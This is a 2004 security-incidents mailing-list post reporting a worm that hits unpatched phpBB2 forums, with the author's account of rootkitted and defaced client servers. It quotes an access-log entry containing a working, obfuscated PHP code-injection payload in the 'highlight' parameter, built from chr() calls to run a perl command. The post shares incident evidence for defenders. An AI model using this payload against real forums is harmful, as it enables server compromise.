Worm hitting PHPbb2 Forums
From: L. Walker (lwalker_at_magi.net.au)
Date: 12/21/04
- Previous message: Michael H. Warfield: "Re: SSH scans..."
- Next in thread: Christopher Adickes: "RE: Worm hitting PHPbb2 Forums"
- Maybe reply: Christopher Adickes: "RE: Worm hitting PHPbb2 Forums"
- Reply: mark_at_onnow.net: "Re: Worm hitting PHPbb2 Forums"
- Reply: Chris Ess: "Re: Worm hitting PHPbb2 Forums"
- Maybe reply: Chris Ess: "Re: Worm hitting PHPbb2 Forums"
- Maybe reply: Mike: "RE: Worm hitting PHPbb2 Forums"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Tue, 21 Dec 2004 20:23:11 +1100 (EST) To: incidents@securityfocus.com
Just spotted two clients hit by this. One client didnt update his
software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16.
Chkrootkit says its Adore, however could be something else. Datacenter
wasn't very smart and has since wiped the server, so no binaries or other
evidence.
Generation 12 only wiped out PHP files, replacing them with its own
message on other client's PHPbb2 forum. Access logs show:
66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527
HTTP/1.0" 200 270
"http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
-- L. Walker <lwalker at magi dot net dot au> Network Administrator / Consultant --
- Previous message: Michael H. Warfield: "Re: SSH scans..."
- Next in thread: Christopher Adickes: "RE: Worm hitting PHPbb2 Forums"
- Maybe reply: Christopher Adickes: "RE: Worm hitting PHPbb2 Forums"
- Reply: mark_at_onnow.net: "Re: Worm hitting PHPbb2 Forums"
- Reply: Chris Ess: "Re: Worm hitting PHPbb2 Forums"
- Maybe reply: Chris Ess: "Re: Worm hitting PHPbb2 Forums"
- Maybe reply: Mike: "RE: Worm hitting PHPbb2 Forums"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
